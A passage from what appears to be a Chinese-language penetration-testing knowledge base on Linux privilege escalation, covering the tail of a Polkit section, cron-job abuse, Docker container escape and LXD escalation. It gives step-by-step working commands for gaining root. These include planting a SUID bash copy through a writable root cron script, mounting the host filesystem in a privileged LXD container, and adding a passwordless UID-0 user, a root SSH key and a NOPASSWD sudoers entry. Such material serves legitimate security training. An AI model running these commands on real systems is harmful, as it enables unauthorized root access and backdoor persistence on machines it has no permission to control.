<p>polkit是一个授权管理器，其系统架构由授权和身份验证代理组成，pkexec是其中polkit的其中一个工具，他的作用有点类似于sudo，允许用户以另一个用户身份执行命令polkit 提供了一个授权 API，供特权程序（“ MECHANISMS ” ）使用，通常通过某种形式的进程间通信机制为非特权程序（ “ SUBJECTS ”）提供服务。在这种情况下，该机制通常将主体视为不受信任。对于来自主体的每个请求，该机制需要确定该请求是否被授权，或者它是否应该拒绝为主体提供服务。使用 polkit API，一种机制可以将此决定转交给受信任的一方：polkit 权威。polkit 权限被实现为系统守护进程 polkitd (8)，它本身没有什么特权，因为它以 polkitd系统用户身份运行。机制、主体和认证代理使用系统消息总线与授权机构进行通信。除了作为授权之外，polkit 还允许用户通过验证管理用户或客户端所属会话的所有者来获得临时授权。这对于机制需要验证系统的操作员确实是用户还是管理用户的场景很有用漏洞点逻辑：执行pkexec时，指定了恶意的envp[0]，那么可以写入一个环境变量到目标进程空间中</p>
<h3 class="anchor anchorWithStickyNavbar_LWe7" id="计划任务-提权">计划任务 提权<a href="#计划任务-提权" class="hash-link" aria-label="Direct link to 计划任务 提权" title="Direct link to 计划任务 提权" translate="no">​</a></h3>
<p>**定时任务（cron job）**可以用来设置周期执行的命令，提权的原理为计划任务以root权限运行，计划任务中的脚本其他用户有写入的权限，或者脚本所属组为其他用户，则可以进行计划任务提权。常用命令如下：</p>
<ul>
<li><code>crontab -e</code> 编辑计划任务</li>
<li><code>crontab -l</code> 查看计划任务</li>
<li><code>crontab -r</code> 删除目前的crontab</li>
</ul>
<p><strong>计划任务提权</strong> 是通过滥用系统中的定时任务（cron）来实现权限提升。若某些定时任务脚本由 root 用户运行，但其脚本路径或调用的二进制文件可被低权限用户修改，就可以插入恶意命令，等定时任务触发后以 root 权限执行，从而完成提权。</p>
<p>常见利用场景是 <code>/etc/crontab</code> 或 <code>/etc/cron.d/*</code> 中有如下内容：</p>
<div class="language-sh codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-sh codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">* * * * * root /usr/local/bin/backup.sh</span><br></span></code></pre></div></div>
<p>如果当前用户可以修改 <code>/usr/local/bin/backup.sh</code>，就可以写入如下内容：</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">#!/bin/bash</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">cp /bin/bash /tmp/rootbash &amp;&amp; chmod +s /tmp/rootbash</span><br></span></code></pre></div></div>
<p>等待 cron 自动执行后，即可使用：</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">/tmp/rootbash -p</span><br></span></code></pre></div></div>
<p>获得 root shell。</p>
<p>这种提权方式通常需要结合：</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">find / -writable -type f 2&gt;/dev/null</span><br></span></code></pre></div></div>
<p>等命令寻找可写脚本，或使用 <code>pspy</code> 工具监听定时任务执行行为，是实战中非常常见的一种提权手段。</p>
<h3 class="anchor anchorWithStickyNavbar_LWe7" id="docker-提权">Docker 提权<a href="#docker-提权" class="hash-link" aria-label="Direct link to Docker 提权" title="Direct link to Docker 提权" translate="no">​</a></h3>
<p><strong>Docker 容器内逃逸提权</strong> 是指攻击者在容器内，通过利用宿主机与容器之间的接口或权限配置缺陷，从容器中突破隔离限制，获得宿主机权限。</p>
<p>常见逃逸方式如下：</p>
<ul>
<li>
<p><strong>挂载宿主机文件系统的容器</strong>（如 <code>/</code> 挂到容器中）：
容器内可执行：
chroot /mnt
就可以访问宿主机的根目录。</p>
</li>
<li>
<p><strong>/var/run/docker.sock 挂载到容器中</strong>：
攻击者可以通过 docker API 操作宿主机容器，创建挂载了 <code>/</code> 的新容器，从而实现宿主机 root 提权。</p>
</li>
<li>
<p><strong>具有 CAP_SYS_ADMIN 等高权限的容器</strong>：
如果容器运行时加了 <code>--cap-add=ALL</code> 或 <code>--privileged</code>，即可利用内核接口（如挂载、加载模块）进行提权或逃逸。</p>
</li>
</ul>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">docker run --rm -it --privileged alpine</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">mount -t proc proc /proc</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">chroot /host</span><br></span></code></pre></div></div>
<ul>
<li><strong>利用已知内核逃逸漏洞</strong>：
如果宿主机内核存在漏洞（如 Dirty COW、overlayfs），容器内可用本地提权 exploit 实现宿主机提权。</li>
</ul>
<h3 class="anchor anchorWithStickyNavbar_LWe7" id="k8s-提权cve-2018-1002105">K8s 提权（CVE-2018-1002105）<a href="#k8s-提权cve-2018-1002105" class="hash-link" aria-label="Direct link to K8s 提权（CVE-2018-1002105）" title="Direct link to K8s 提权（CVE-2018-1002105）" translate="no">​</a></h3>
<h3 class="anchor anchorWithStickyNavbar_LWe7" id="lxd-提权">LXD 提权<a href="#lxd-提权" class="hash-link" aria-label="Direct link to LXD 提权" title="Direct link to LXD 提权" translate="no">​</a></h3>
<p>LXD（Linux Container Daemon）是一个用于管理 Linux 容器的工具。在默认配置或管理不当的情况下，攻击者可以利用 LXD 进行本地提权（Local Privilege Escalation），获取宿主机的 root 权限。</p>
<hr>
<p><strong>LXD 提权原理</strong></p>
<ul>
<li>
<p>（1）核心问题：特权容器（Privileged Containers）：LXD 允许用户创建特权容器（<code>security.privileged=true</code>），这类容器会绕过 Linux 的用户命名空间隔离（User Namespace），导致容器内的 root 用户等同于宿主机的 root 用户。</p>
</li>
<li>
<p>（2）关键条件：当前用户在 <code>lxd</code> 用户组 / LXD 服务未正确配置安全策略（允许普通用户创建特权容器）</p>
</li>
<li>
<p>提权路径</p>
</li>
</ul>
<ol>
<li>用户通过 <code>lxd</code> 组权限与 LXD 守护进程通信</li>
<li>创建特权容器并挂载宿主机文件系统</li>
<li>在容器内修改宿主机敏感文件（如 <code>/etc/passwd</code>、<code>/etc/shadow</code>）或写入 SSH 密钥</li>
<li>获得宿主机 root 权限</li>
</ol>
<hr>
<p><strong>实际提权案例演示</strong></p>
<ul>
<li>步骤 1：检查当前用户是否在 <code>lxd</code> 组</li>
</ul>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">id</span><br></span></code></pre></div></div>
<p>如果输出包含 lxd，则存在提权可能：</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">uid=1001(test) gid=1001(test) groups=1001(test),108(lxd)</span><br></span></code></pre></div></div>
<ul>
<li>步骤 2：创建特权容器并挂载宿主机 / 目录</li>
</ul>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain"># 初始化一个特权容器（使用Ubuntu镜像）</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">lxc init ubuntu:22.04 privesc -c security.privileged=true</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"># 将宿主机的根目录`/`挂载到容器的`/mnt/root`</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"># 启动容器</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">lxc start privesc</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain" style="display:inline-block"></span><br></span><span class="token-line" style="color:#393A34"><span class="token plain"># 进入容器shell</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">lxc exec privesc bash</span><br></span></code></pre></div></div>
<ul>
<li>步骤 3：在容器内修改宿主机文件</li>
</ul>
<p>容器的 /mnt/root 就是宿主机的 /，可以直接修改关键文件：</p>
<p>方法 1：直接修改 <code>/etc/passwd</code>，添加 root 权限用户</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">echo &quot;hacker::0:0::/root:/bin/bash&quot; &gt;&gt; /mnt/root/etc/passwd</span><br></span></code></pre></div></div>
<p>然后，在宿主机上切换到 <code>hacker</code> 用户即可获得 root：</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">su hacker</span><br></span></code></pre></div></div>
<p><strong>方法 2：写入 SSH 公钥到 <code>/root/.ssh/authorized_keys</code></strong></p>
<div class="language-text codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-text codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">mkdir -p /mnt/root/root/.ssh</span><br></span><span class="token-line" style="color:#393A34"><span class="token plain">echo &quot;ssh-rsa AAAAB3NzaC1yc2E...&quot; &gt;&gt; /mnt/root/root/.ssh/authorized_keys</span><br></span></code></pre></div></div>
<p>然后，直接 SSH 登录宿主机的 root 用户：</p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">ssh root@localhost</span><br></span></code></pre></div></div>
<p><strong>方法 3：修改 <code>/etc/sudoers</code> 让当前用户免密提权</strong></p>
<div class="language-bash codeBlockContainer_Ckt0 theme-code-block" style="--prism-color:#393A34;--prism-background-color:#f6f8fa"><div class="codeBlockContent_QJqH"><pre tabindex="0" class="prism-code language-bash codeBlock_bY9V thin-scrollbar" style="color:#393A34;background-color:#f6f8fa"><code class="codeBlockLines_e6Vv"><span class="token-line" style="color:#393A34"><span class="token plain">echo &quot;www-data ALL=(ALL) NOPASSWD:ALL&quot; &gt;&gt; /mnt/root/etc/sudoers</span><br></span></code></pre></div></div>
<p>然后，在宿主机上执行 <code>sudo su</code> 即可获得 root。</p></div><footer class="theme-doc-footer docusaurus-mt-lg"><div class="row margin-top--sm theme-doc-footer-edit-meta-row"><div class="col"><a href="https://github.com/facebook/docusaurus/tree/main/packages/create-docusaurus/templates/shared/docs/个人知识库/01.渗透测试/04.内网渗透/04.Linux提权/README.md" target="_blank" rel="noopener noreferrer" class="theme-edit-this-page"><svg fill="currentColor" height="20" width="20" viewBox="0 0 40 40" class="iconEdit_Z9Sw" aria-hidden="true"><g><path d="m34.5 11.7l-3 3.1-6.3-6.3 3.1-3q0.5-0.5 1.2-0.5t1.1 0.5l3.9 3.9q0.5 0.4 0.5 1.1t-0.5 1.2z m-29.5 17.1l18.4-18.5 6.3 6.3-18.4 18.4h-6.3v-6.2z"></path></g></svg>Edit this page</a></div><div class="col lastUpdated_JAkA"></div></div></footer></article><nav class="docusaurus-mt-lg pagination-nav" aria-label="Docs pages"><a class="pagination-nav__link pagination-nav__link--prev" href="/en/docs/个人知识库/渗透测试/内网渗透/k3s安装/"><div class="pagination-nav__sublabel">Previous</div><div class="pagination-nav__label">k3s安装</div></a><a class="pagination-nav__link pagination-nav__link--next" href="/en/docs/个人知识库/渗透测试/渗透手法/某大学渗透测试/"><div class="pagination-nav__sublabel">Next</div><div class="pagination-nav__label">某大学渗透测试</div></a></nav></div></div><div class="col col--3"><div class="tableOfContents_bqdL thin-scrollbar theme-doc-toc-desktop"><ul class="table-of-contents table-of-contents__left-border"><li><a href="#前言" class="table-of-contents__link toc-highlight">前言</a></li><li><a href="#基础知识" class="table-of-contents__link toc-highlight">基础知识</a><ul><li><a href="#手册" class="table-of-contents__link toc-highlight">手册</a></li><li><a href="#用户和权限" class="table-of-contents__link toc-highlight">用户和权限</a></li><li><a href="#suid-和-sgid" class="table-of-contents__link toc-highlight">SUID 和 SGID</a></li><li><a href="#linux-capabilities" class="table-of-contents__link toc-highlight">Linux Capabilities</a></li></ul></li><li><a href="#提权方法" class="table-of-contents__link toc-highlight">提权方法</a><ul><li><a href="#suid-提权" class="table-of-contents__link toc-highlight">SUID 提权</a></li><li><a href="#linux-内核漏洞" class="table-of-contents__link toc-highlight">Linux 内核漏洞</a></li><li><a href="#passwd提权" class="table-of-contents__link toc-highlight">Passwd提权</a></li><li><a href="#wildcard提权" class="table-of-contents__link toc-highlight">Wildcard提权</a></li><li><a href="#mysql-udf提权" class="table-of-contents__link toc-highlight">Mysql UDF提权</a></li><li><a href="#redis-提权" class="table-of-contents__link toc-highlight">Redis 提权</a></li><li><a href="#capabilities-提权" class="table-of-contents__link toc-highlight">Capabilities 提权</a></li><li><a href="#sudo-提权" class="table-of-contents__link toc-highlight">Sudo 提权</a></li><li><a href="#内核-提权" class="table-of-contents__link toc-highlight">内核 提权</a></li><li><a href="#脏牛-提权cve-2016-5195" class="table-of-contents__link toc-highlight">脏牛 提权（CVE-2016-5195）</a></li><li><a href="#polkit-提权cve-2021-4034" class="table-of-contents__link toc-highlight">Polkit 提权（CVE-2021-4034）</a></li><li><a href="#计划任务-提权" class="table-of-contents__link toc-highlight">计划任务 提权</a></li><li><a href="#docker-提权" class="table-of-contents__link toc-highlight">Docker 提权</a></li><li><a href="#k8s-提权cve-2018-1002105" class="table-of-contents__link toc-highlight">K8s 提权（CVE-2018-1002105）</a></li><li><a href="#lxd-提权" class="table-of-contents__link toc-highlight">LXD 提权</a></li></ul></li></ul></div></div></div></div></main></div></div></div><footer class="theme-layout-footer footer footer--dark"><div class="container container-fluid"><div class="row footer__links"><div class="theme-layout-footer-column col footer__col"><div class="footer__title">内容导航</div><ul class="footer__items clean-list"><li class="footer__item"><a class="footer__link-item" href="/docs/intro"><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" aria-hidden="true" style="margin-right:6px;vertical-align:text-bottom"><rect x="3" y="4" width="14" height="16" rx="2" fill="currentColor"></rect><rect x="5" y="6" width="10" height="1.5" fill="white" opacity="0.9"></rect><rect x="5" y="9" width="10" height="1.5" fill="white" opacity="0.9"></rect></svg>个人知识库</a></li><li class="footer__item"><a class="footer__link-item" href="/docs/更新日志"><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" aria-hidden="true" style="margin-right:6px;vertical-align:text-bottom"><circle cx="12" cy="12" r="8" stroke="currentColor" stroke-width="2"></circle><polyline points="12,7 12,12 16,14" stroke="currentColor" stroke-width="2" fill="none" stroke-linecap="round" stroke-linejoin="round"></polyline></svg>日志更新</a></li><li class="footer__item"><a class="footer__link-item" href="https://www.wjlin0.com/links"><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" aria-hidden="true" style="margin-right:6px;vertical-align:text-bottom"><polyline points="8,5 16,12 8,19" stroke="currentColor" stroke-width="2" fill="none" stroke-linecap="round" stroke-linejoin="round"></polyline></svg>友链</a></li></ul></div><div class="theme-layout-footer-column col footer__col"><div class="footer__title">实用工具</div><ul class="footer__items clean-list"><li class="footer__item"><a class="footer__link-item" href="https://stackoverflow.com/questions/tagged/docusaurus" target="_blank" rel="noopener noreferrer"><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" aria-hidden="true" style="margin-right:6px;vertical-align:text-bottom"><polyline points="8,5 16,12 8,19" stroke="currentColor" stroke-width="2" fill="none" stroke-linecap="round" stroke-linejoin="round"></polyline></svg>微信公众号写文章助手</a></li><li class="footer__item"><a class="footer__link-item" href="https://gtfobins.github.io/" target="_blank" rel="noopener noreferrer"><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" aria-hidden="true" style="margin-right:6px;vertical-align:text-bottom"><polyline points="8,5 16,12 8,19" stroke="currentColor" stroke-width="2" fill="none" stroke-linecap="round" stroke-linejoin="round"></polyline></svg>GTFOBins</a></li><li class="footer__item"><a class="footer__link-item" href="https://revshells.com" target="_blank" rel="noopener noreferrer"><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" aria-hidden="true" style="margin-right:6px;vertical-align:text-bottom"><polyline points="8,5 16,12 8,19" stroke="currentColor" stroke-width="2" fill="none" stroke-linecap="round" stroke-linejoin="round"></polyline></svg>红队工具</a></li><li class="footer__item"><a class="footer__link-item" href="https://regex-vis.com/" target="_blank" rel="noopener noreferrer"><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" aria-hidden="true" style="margin-right:6px;vertical-align:text-bottom"><polyline points="8,5 16,12 8,19" stroke="currentColor" stroke-width="2" fill="none" stroke-linecap="round" stroke-linejoin="round"></polyline></svg>正则可视化</a></li></ul></div><div class="theme-layout-footer-column col footer__col"><div class="footer__title">关注我</div><ul class="footer__items clean-list"><li class="footer__item"><a class="footer__link-item" href="https://github.com/wjlin0" target="_blank" rel="noopener noreferrer"><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" aria-hidden="true" style="margin-right:6px;vertical-align:text-bottom"><polyline points="7,8 4,12 7,16" stroke="currentColor" stroke-width="2" fill="none" stroke-linecap="round" stroke-linejoin="round"></polyline><polyline points="17,8 20,12 17,16" stroke="currentColor" stroke-width="2" fill="none" stroke-linecap="round" stroke-linejoin="round"></polyline><line x1="10" y1="18" x2="14" y2="6" stroke="currentColor" stroke-width="2" stroke-linecap="round"/></svg>GitHub</a></li><li class="footer__item"><a class="footer__link-item" href="mailto:admin@wjlin0.com" target="_blank" rel="noopener noreferrer"><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" aria-hidden="true" style="margin-right:6px;vertical-align:text-bottom"><rect x="3" y="6" width="18" height="12" rx="2" ry="2" stroke="currentColor" stroke-width="2" fill="none"></rect><polyline points="4,7 12,13 20,7" stroke="currentColor" stroke-width="2" fill="none" stroke-linecap="round" stroke-linejoin="round"></polyline></svg>联系我</a></li><li class="footer__item"><a class="footer__link-item" href="https://www.wjlin0.com/links#add"><svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" aria-hidden="true" style="margin-right:6px;vertical-align:text-bottom"><circle cx="12" cy="12" r="8" stroke="currentColor" stroke-width="2" fill="none"></circle><line x1="12" y1="8" x2="12" y2="16" stroke="currentColor" stroke-width="2" stroke-linecap="round"></line><line x1="8" y1="12" x2="16" y2="12" stroke="currentColor" stroke-width="2" stroke-linecap="round"></line></svg>添加友链</a></li></ul></div></div><div class="footer__bottom text--center"><div class="footer__copyright">Copyright © 2025 wjlin0 知识库</div></div></div></footer></div>
</body>
</html>